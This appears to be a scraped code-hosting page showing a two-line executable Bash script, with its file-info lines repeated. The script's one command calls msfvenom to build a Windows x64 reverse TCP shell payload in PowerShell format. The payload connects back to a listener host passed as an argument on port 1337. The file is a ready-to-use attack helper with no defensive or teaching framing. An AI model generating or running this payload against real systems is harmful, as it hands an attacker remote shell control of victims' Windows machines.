2 lines
78 B
Bash
Executable File
2 lines
78 B
Bash
Executable File
msfvenom -p windows/x64/shell_reverse_tcp LHOST="$1" LPORT=1337 -f powershell
|